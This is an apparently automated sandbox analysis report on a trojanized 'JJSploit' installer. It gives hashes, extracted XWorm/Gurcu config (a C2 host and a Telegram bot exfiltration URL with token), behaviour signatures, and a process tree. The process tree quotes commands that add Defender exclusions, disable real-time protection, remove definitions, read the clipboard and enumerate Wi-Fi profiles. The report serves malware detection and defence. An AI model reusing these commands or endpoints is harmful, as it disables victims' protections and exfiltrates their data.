Analysis
-
max time kernel
149s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
24-11-2024 10:22
Static task
static1
Behavioral task
behavioral1
Sample
JJSploit_8.10.7_x64-setup.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
JJSploit_8.10.7_x64-setup.exe
Resource
win10v2004-20241007-en
General
-
Target
JJSploit_8.10.7_x64-setup.exe
-
Size
19.0MB
-
MD5
ab53c5d1bdcf304124561fbc7f3a7915
-
SHA1
92ae497974a20f77127e536686952235ad4b9ffc
-
SHA256
cc329ae0aa9e11a9028302a83fe21c41648f28f05c55bb97f22b5f4b2af32ec2
-
SHA512
6fd6049dd91775bdec19a6b867d1d32d421b710ece922af22adea054bd454e6263e23e8884c3f1f1024d74f49e1e351882d605292932a4f382c85a664304b35a
-
SSDEEP
196608:3rwl+2o/3hfvtz0rjEzDZPb7sF87ERxgcyAtANSP7+bjMUURHvunEywSRCT8H:K+BvqrjE/R3g8YRxNtANI7+bm0E7SZH
Malware Config
Extracted
xworm
5.0
review-tub.gl.at.ply.gg:35036
hl5BkPGyS9Yy5EMg
-
Install_directory
%AppData%
-
install_file
msedgewebview2.exe
-
telegram
https://api.telegram.org/bot7247711860:AAEZVVyI8BKIccD8HUVaVUhc-jqat0-9cAY/sendMessage?chat_id=7163197258
Extracted
gurcu
https://api.telegram.org/bot7247711860:AAEZVVyI8BKIccD8HUVaVUhc-jqat0-9cAY/sendMessage?chat_id=7163197258
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x000a000000023b7c-92.dat family_xworm behavioral2/memory/3484-118-0x0000000000160000-0x0000000000174000-memory.dmp family_xworm -
Gurcu family
-
Xworm family
-
pid Process 4440 powershell.exe 4732 powershell.exe 1648 powershell.exe 2156 powershell.exe 2908 powershell.exe 4056 powershell.exe 1516 powershell.exe 5008 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation JJSploit_8.10.7_x64-setup.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation Microsoft Edge WebView2.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 2064 powershell.exe 2572 cmd.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedgewebview2.lnk Microsoft Edge WebView2.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedgewebview2.lnk Microsoft Edge WebView2.exe -
Executes dropped EXE 7 IoCs
pid Process 948 Loader.exe 3484 Microsoft Edge WebView2.exe 1052 Loader.exe 1168 rar.exe 5104 msedgewebview2.exe 768 msedgewebview2.exe 3372 msedgewebview2.exe -
Loads dropped DLL 17 IoCs
pid Process 1052 Loader.exe 1052 Loader.exe 1052 Loader.exe 1052 Loader.exe 1052 Loader.exe 1052 Loader.exe 1052 Loader.exe 1052 Loader.exe 1052 Loader.exe 1052 Loader.exe 1052 Loader.exe 1052 Loader.exe 1052 Loader.exe 1052 Loader.exe 1052 Loader.exe 1052 Loader.exe 1052 Loader.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedgewebview2 = "C:\\Users\\Admin\\AppData\\Roaming\\msedgewebview2.exe" Microsoft Edge WebView2.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 23 discord.com 24 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 16 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 392 tasklist.exe 2720 tasklist.exe 3448 tasklist.exe -
resource yara_rule behavioral2/files/0x000a000000023b8d-113.dat upx behavioral2/memory/1052-117-0x00007FFF3BFF0000-0x00007FFF3C5D9000-memory.dmp upx behavioral2/files/0x0031000000023b80-121.dat upx behavioral2/memory/1052-141-0x00007FFF53000000-0x00007FFF5300F000-memory.dmp upx behavioral2/files/0x000a000000023b87-140.dat upx behavioral2/files/0x000a000000023b92-132.dat upx behavioral2/files/0x000a000000023b91-131.dat upx behavioral2/files/0x000a000000023b90-130.dat upx behavioral2/files/0x000a000000023b8c-127.dat upx behavioral2/files/0x000a000000023b8a-126.dat upx behavioral2/files/0x000a000000023b86-139.dat upx behavioral2/files/0x000a000000023b85-138.dat upx behavioral2/files/0x000a000000023b84-137.dat upx behavioral2/files/0x000a000000023b83-136.dat upx behavioral2/files/0x000a000000023b82-135.dat upx behavioral2/files/0x0031000000023b81-134.dat upx behavioral2/files/0x0031000000023b7f-133.dat upx behavioral2/files/0x000a000000023b8b-124.dat upx behavioral2/memory/1052-123-0x00007FFF4D4D0000-0x00007FFF4D4F3000-memory.dmp upx behavioral2/memory/1052-147-0x00007FFF4CF00000-0x00007FFF4CF2D000-memory.dmp upx behavioral2/memory/1052-151-0x00007FFF4CED0000-0x00007FFF4CEF3000-memory.dmp upx behavioral2/memory/1052-153-0x00007FFF4CB00000-0x00007FFF4CC70000-memory.dmp upx behavioral2/memory/1052-149-0x00007FFF4D4B0000-0x00007FFF4D4C9000-memory.dmp upx behavioral2/memory/1052-157-0x00007FFF52FF0000-0x00007FFF52FFD000-memory.dmp upx behavioral2/memory/1052-156-0x00007FFF4CEB0000-0x00007FFF4CEC9000-memory.dmp upx behavioral2/memory/1052-162-0x00007FFF4CE80000-0x00007FFF4CEAE000-memory.dmp upx behavioral2/memory/1052-163-0x00007FFF39CC0000-0x00007FFF3A039000-memory.dmp upx behavioral2/memory/1052-165-0x00007FFF3BFF0000-0x00007FFF3C5D9000-memory.dmp upx behavioral2/memory/1052-166-0x00007FFF3A040000-0x00007FFF3A0F8000-memory.dmp upx behavioral2/memory/1052-168-0x00007FFF4D4D0000-0x00007FFF4D4F3000-memory.dmp upx behavioral2/memory/1052-171-0x00007FFF4E250000-0x00007FFF4E25D000-memory.dmp upx behavioral2/memory/1052-174-0x00007FFF39BA0000-0x00007FFF39CBC000-memory.dmp upx behavioral2/memory/1052-173-0x00007FFF4CF00000-0x00007FFF4CF2D000-memory.dmp upx behavioral2/memory/1052-169-0x00007FFF4CD90000-0x00007FFF4CDA4000-memory.dmp upx behavioral2/memory/1052-244-0x00007FFF4D4B0000-0x00007FFF4D4C9000-memory.dmp upx behavioral2/memory/1052-302-0x00007FFF4CB00000-0x00007FFF4CC70000-memory.dmp upx behavioral2/memory/1052-297-0x00007FFF4CED0000-0x00007FFF4CEF3000-memory.dmp upx behavioral2/memory/1052-394-0x00007FFF4CEB0000-0x00007FFF4CEC9000-memory.dmp upx behavioral2/memory/1052-406-0x00007FFF4CE80000-0x00007FFF4CEAE000-memory.dmp upx behavioral2/memory/1052-408-0x00007FFF39CC0000-0x00007FFF3A039000-memory.dmp upx behavioral2/memory/1052-420-0x00007FFF3A040000-0x00007FFF3A0F8000-memory.dmp upx behavioral2/memory/1052-431-0x00007FFF3BFF0000-0x00007FFF3C5D9000-memory.dmp upx behavioral2/memory/1052-445-0x00007FFF39BA0000-0x00007FFF39CBC000-memory.dmp upx behavioral2/memory/1052-437-0x00007FFF4CB00000-0x00007FFF4CC70000-memory.dmp upx behavioral2/memory/1052-432-0x00007FFF4D4D0000-0x00007FFF4D4F3000-memory.dmp upx behavioral2/memory/1052-446-0x00007FFF3BFF0000-0x00007FFF3C5D9000-memory.dmp upx behavioral2/memory/1052-474-0x00007FFF39BA0000-0x00007FFF39CBC000-memory.dmp upx behavioral2/memory/1052-473-0x00007FFF4E250000-0x00007FFF4E25D000-memory.dmp upx behavioral2/memory/1052-472-0x00007FFF4CD90000-0x00007FFF4CDA4000-memory.dmp upx behavioral2/memory/1052-471-0x00007FFF4CE80000-0x00007FFF4CEAE000-memory.dmp upx behavioral2/memory/1052-470-0x00007FFF39CC0000-0x00007FFF3A039000-memory.dmp upx behavioral2/memory/1052-469-0x00007FFF4CB00000-0x00007FFF4CC70000-memory.dmp upx behavioral2/memory/1052-468-0x00007FFF52FF0000-0x00007FFF52FFD000-memory.dmp upx behavioral2/memory/1052-467-0x00007FFF4CEB0000-0x00007FFF4CEC9000-memory.dmp upx behavioral2/memory/1052-466-0x00007FFF3A040000-0x00007FFF3A0F8000-memory.dmp upx behavioral2/memory/1052-465-0x00007FFF4CED0000-0x00007FFF4CEF3000-memory.dmp upx behavioral2/memory/1052-464-0x00007FFF4D4B0000-0x00007FFF4D4C9000-memory.dmp upx behavioral2/memory/1052-463-0x00007FFF4CF00000-0x00007FFF4CF2D000-memory.dmp upx behavioral2/memory/1052-462-0x00007FFF53000000-0x00007FFF5300F000-memory.dmp upx behavioral2/memory/1052-461-0x00007FFF4D4D0000-0x00007FFF4D4F3000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JJSploit_8.10.7_x64-setup.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4720 cmd.exe 2828 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4400 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 3012 systeminfo.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ JJSploit_8.10.7_x64-setup.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings taskmgr.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3064 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4440 powershell.exe 4440 powershell.exe 2156 powershell.exe 2156 powershell.exe 2064 powershell.exe 2064 powershell.exe 2064 powershell.exe 2856 powershell.exe 2856 powershell.exe 2856 powershell.exe 4732 powershell.exe 4732 powershell.exe 2908 powershell.exe 2908 powershell.exe 4064 powershell.exe 4064 powershell.exe 4056 powershell.exe 4056 powershell.exe 1516 powershell.exe 1516 powershell.exe 5008 powershell.exe 5008 powershell.exe 3484 Microsoft Edge WebView2.exe 1648 powershell.exe 1648 powershell.exe 4180 powershell.exe 4180 powershell.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4776 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3484 Microsoft Edge WebView2.exe Token: SeDebugPrivilege 4440 powershell.exe Token: SeDebugPrivilege 2156 powershell.exe Token: SeDebugPrivilege 2720 tasklist.exe Token: SeDebugPrivilege 392 tasklist.exe Token: SeIncreaseQuotaPrivilege 320 WMIC.exe Token: SeSecurityPrivilege 320 WMIC.exe Token: SeTakeOwnershipPrivilege 320 WMIC.exe Token: SeLoadDriverPrivilege 320 WMIC.exe Token: SeSystemProfilePrivilege 320 WMIC.exe Token: SeSystemtimePrivilege 320 WMIC.exe Token: SeProfSingleProcessPrivilege 320 WMIC.exe Token: SeIncBasePriorityPrivilege 320 WMIC.exe Token: SeCreatePagefilePrivilege 320 WMIC.exe Token: SeBackupPrivilege 320 WMIC.exe Token: SeRestorePrivilege 320 WMIC.exe Token: SeShutdownPrivilege 320 WMIC.exe Token: SeDebugPrivilege 320 WMIC.exe Token: SeSystemEnvironmentPrivilege 320 WMIC.exe Token: SeRemoteShutdownPrivilege 320 WMIC.exe Token: SeUndockPrivilege 320 WMIC.exe Token: SeManageVolumePrivilege 320 WMIC.exe Token: 33 320 WMIC.exe Token: 34 320 WMIC.exe Token: 35 320 WMIC.exe Token: 36 320 WMIC.exe Token: SeDebugPrivilege 3448 tasklist.exe Token: SeDebugPrivilege 2064 powershell.exe Token: SeDebugPrivilege 2856 powershell.exe Token: SeIncreaseQuotaPrivilege 320 WMIC.exe Token: SeSecurityPrivilege 320 WMIC.exe Token: SeTakeOwnershipPrivilege 320 WMIC.exe Token: SeLoadDriverPrivilege 320 WMIC.exe Token: SeSystemProfilePrivilege 320 WMIC.exe Token: SeSystemtimePrivilege 320 WMIC.exe Token: SeProfSingleProcessPrivilege 320 WMIC.exe Token: SeIncBasePriorityPrivilege 320 WMIC.exe Token: SeCreatePagefilePrivilege 320 WMIC.exe Token: SeBackupPrivilege 320 WMIC.exe Token: SeRestorePrivilege 320 WMIC.exe Token: SeShutdownPrivilege 320 WMIC.exe Token: SeDebugPrivilege 320 WMIC.exe Token: SeSystemEnvironmentPrivilege 320 WMIC.exe Token: SeRemoteShutdownPrivilege 320 WMIC.exe Token: SeUndockPrivilege 320 WMIC.exe Token: SeManageVolumePrivilege 320 WMIC.exe Token: 33 320 WMIC.exe Token: 34 320 WMIC.exe Token: 35 320 WMIC.exe Token: 36 320 WMIC.exe Token: SeDebugPrivilege 4732 powershell.exe Token: SeDebugPrivilege 2908 powershell.exe Token: SeDebugPrivilege 4064 powershell.exe Token: SeDebugPrivilege 4056 powershell.exe Token: SeDebugPrivilege 1516 powershell.exe Token: SeDebugPrivilege 5008 powershell.exe Token: SeDebugPrivilege 3484 Microsoft Edge WebView2.exe Token: SeIncreaseQuotaPrivilege 2132 WMIC.exe Token: SeSecurityPrivilege 2132 WMIC.exe Token: SeTakeOwnershipPrivilege 2132 WMIC.exe Token: SeLoadDriverPrivilege 2132 WMIC.exe Token: SeSystemProfilePrivilege 2132 WMIC.exe Token: SeSystemtimePrivilege 2132 WMIC.exe Token: SeProfSingleProcessPrivilege 2132 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe 4776 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3484 Microsoft Edge WebView2.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1080 wrote to memory of 948 1080 JJSploit_8.10.7_x64-setup.exe 82 PID 1080 wrote to memory of 948 1080 JJSploit_8.10.7_x64-setup.exe 82 PID 1080 wrote to memory of 3484 1080 JJSploit_8.10.7_x64-setup.exe 83 PID 1080 wrote to memory of 3484 1080 JJSploit_8.10.7_x64-setup.exe 83 PID 948 wrote to memory of 1052 948 Loader.exe 84 PID 948 wrote to memory of 1052 948 Loader.exe 84 PID 1052 wrote to memory of 2188 1052 Loader.exe 140 PID 1052 wrote to memory of 2188 1052 Loader.exe 140 PID 1052 wrote to memory of 1620 1052 Loader.exe 86 PID 1052 wrote to memory of 1620 1052 Loader.exe 86 PID 2188 wrote to memory of 2156 2188 cmd.exe 89 PID 2188 wrote to memory of 2156 2188 cmd.exe 89 PID 1620 wrote to memory of 4440 1620 cmd.exe 90 PID 1620 wrote to memory of 4440 1620 cmd.exe 90 PID 1052 wrote to memory of 452 1052 Loader.exe 91 PID 1052 wrote to memory of 452 1052 Loader.exe 91 PID 1052 wrote to memory of 1040 1052 Loader.exe 92 PID 1052 wrote to memory of 1040 1052 Loader.exe 92 PID 452 wrote to memory of 2720 452 cmd.exe 95 PID 452 wrote to memory of 2720 452 cmd.exe 95 PID 1040 wrote to memory of 392 1040 cmd.exe 96 PID 1040 wrote to memory of 392 1040 cmd.exe 96 PID 1052 wrote to memory of 3528 1052 Loader.exe 97 PID 1052 wrote to memory of 3528 1052 Loader.exe 97 PID 1052 wrote to memory of 2572 1052 Loader.exe 99 PID 1052 wrote to memory of 2572 1052 Loader.exe 99 PID 1052 wrote to memory of 2196 1052 Loader.exe 101 PID 1052 wrote to memory of 2196 1052 Loader.exe 101 PID 1052 wrote to memory of 1800 1052 Loader.exe 103 PID 1052 wrote to memory of 1800 1052 Loader.exe 103 PID 1052 wrote to memory of 4720 1052 Loader.exe 106 PID 1052 wrote to memory of 4720 1052 Loader.exe 106 PID 1052 wrote to memory of 4312 1052 Loader.exe 107 PID 1052 wrote to memory of 4312 1052 Loader.exe 107 PID 1052 wrote to memory of 4472 1052 Loader.exe 154 PID 1052 wrote to memory of 4472 1052 Loader.exe 154 PID 3528 wrote to memory of 320 3528 cmd.exe 112 PID 3528 wrote to memory of 320 3528 cmd.exe 112 PID 2196 wrote to memory of 3448 2196 cmd.exe 113 PID 2196 wrote to memory of 3448 2196 cmd.exe 113 PID 2572 wrote to memory of 2064 2572 cmd.exe 114 PID 2572 wrote to memory of 2064 2572 cmd.exe 114 PID 4312 wrote to memory of 3012 4312 cmd.exe 115 PID 4312 wrote to memory of 3012 4312 cmd.exe 115 PID 4720 wrote to memory of 2828 4720 cmd.exe 116 PID 4720 wrote to memory of 2828 4720 cmd.exe 116 PID 1800 wrote to memory of 1080 1800 cmd.exe 117 PID 1800 wrote to memory of 1080 1800 cmd.exe 117 PID 4472 wrote to memory of 2856 4472 cmd.exe 118 PID 4472 wrote to memory of 2856 4472 cmd.exe 118 PID 1052 wrote to memory of 5064 1052 Loader.exe 119 PID 1052 wrote to memory of 5064 1052 Loader.exe 119 PID 5064 wrote to memory of 4344 5064 cmd.exe 121 PID 5064 wrote to memory of 4344 5064 cmd.exe 121 PID 1052 wrote to memory of 2528 1052 Loader.exe 122 PID 1052 wrote to memory of 2528 1052 Loader.exe 122 PID 2528 wrote to memory of 3180 2528 cmd.exe 124 PID 2528 wrote to memory of 3180 2528 cmd.exe 124 PID 1052 wrote to memory of 2284 1052 Loader.exe 125 PID 1052 wrote to memory of 2284 1052 Loader.exe 125 PID 2284 wrote to memory of 1736 2284 cmd.exe 127 PID 2284 wrote to memory of 1736 2284 cmd.exe 127 PID 1052 wrote to memory of 4844 1052 Loader.exe 128 PID 1052 wrote to memory of 4844 1052 Loader.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\JJSploit_8.10.7_x64-setup.exe"C:\Users\Admin\AppData\Local\Temp\JJSploit_8.10.7_x64-setup.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Loader.exe'"4⤵
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Loader.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
PID:452 -
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵
- Suspicious use of WriteProcessMemory
PID:3528 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵
- Suspicious use of AdjustPrivilegeToken
PID:320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\system32\tree.comtree /A /F5⤵PID:1080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:3012
-
-
-
